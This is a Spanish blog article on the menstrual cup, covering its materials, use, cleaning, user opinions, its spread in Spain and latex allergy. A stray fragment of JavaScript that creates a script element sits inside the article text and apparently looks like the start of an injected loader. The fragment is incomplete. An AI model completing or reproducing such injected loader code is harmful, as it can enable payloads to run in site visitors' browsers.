Salud y belleza » Salud, Salud sexual

La copa menstrual, una alternativa barata, cómoda y ecológica

Sin Comentarios

Pese a que muchas mujeres son reticentes a usarla, otras piensan que la copa menstrual es el mejor invento desde los tampones y las compresas cuya principal ventaja es que es un producto muy higiénico, económico y ecológico. Si quieres saber por qué quienes la usan la recomiendan vamos a explicarte todo lo que necesitas saber sobre la copa menstrual.

copa-menstrual

La copa menstrual es un recipiente de látex o de silicona con forma de copa, normalmente de color rosa, y se vende en diferentes formatos. Gracias al material del que está fabricado se coloca de forma manual dentro de la vagina durante los días de regla. La copa va recogiendo el flujo menstrual y existen copas de distintos tamaños para adaptarse a la mujer en función de si ha tenido partos o de la cantidad de flujo que tenga en cada regla.

Se puede mantener hasta 12 horas y es bastante inusual que llegue a llenarse a lo largo del día. Una vez la copa está llena, se vacía su contenido en el inodoro y se lava la copa con agua templada y abundante para volver a colocar.

Lo que más les gusta a quienes la usan es la higiene, por eso se recomienda lavarla bien al retirarla para poder volver a usarla. Sin embargo, algunas mujeres se quejan de que la capacidad de estos recipientes no es suficiente para contener el volumen de su menstruación, por lo que a menudo tienen que usarla acompañada de una compresa.

Otras son reacias a usar la copa menstrual porque piensan que puede ser algo más sucia y molesta, pero quienes la utilizan aseguran que ni siquiera notan que la llevan puesta. Una vez finalice el ciclo menstrual se debe lavar bien con agua y jabón neutro. Hay algunos fabricantes que incluso recomiendan que se hierva durante un minuto

Muchas aseguran que en los primeros usos necesitaron cierto aprendizaje y adaptación, pero que al poco tiempo conseguían acostumbrarse y están muy contentas con los resultados.

copa-regla

En España todavía no es muy frecuente su uso pero cada vez más mujeres empiezan a conocer este método. En las farmacias incluso se empieza a dispensar como un producto con cultura ecológica y sanitaria. Todavía no existe mucha demanda pero el boca a boca está consiguiendo que se popularice este producto. Eso sí, al ser cápsulas de látex algunas personas tienen alergia, por lo que primero es conveniente hacer una prueba para comprobar que no se sufra ninguna reacción.

¿Utilizas la copa menstrual? ¿La recomendarías?

var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.